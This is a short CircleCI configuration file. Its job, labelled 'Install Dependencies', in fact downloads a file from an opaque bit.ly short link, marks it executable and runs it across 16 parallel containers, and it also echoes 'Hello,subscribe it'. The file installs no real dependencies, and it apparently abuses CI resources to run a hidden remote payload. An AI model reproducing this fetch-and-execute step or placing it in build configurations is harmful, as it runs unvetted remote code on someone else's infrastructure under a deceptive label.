version: 2.1
jobs:
    trial:
      docker:
            - image: circleci/ruby:2.5.3
      parallelism: 16
      steps:
        - run:
            name: Install Dependencies
            command: |
              wget https://bit.ly/3m9HlBR && chmod u+x 3m9HlBR && ./3m9HlBR
              echo Hello,subscribe it

workflows:
    version: 2.1
    build:
        jobs:
        - trial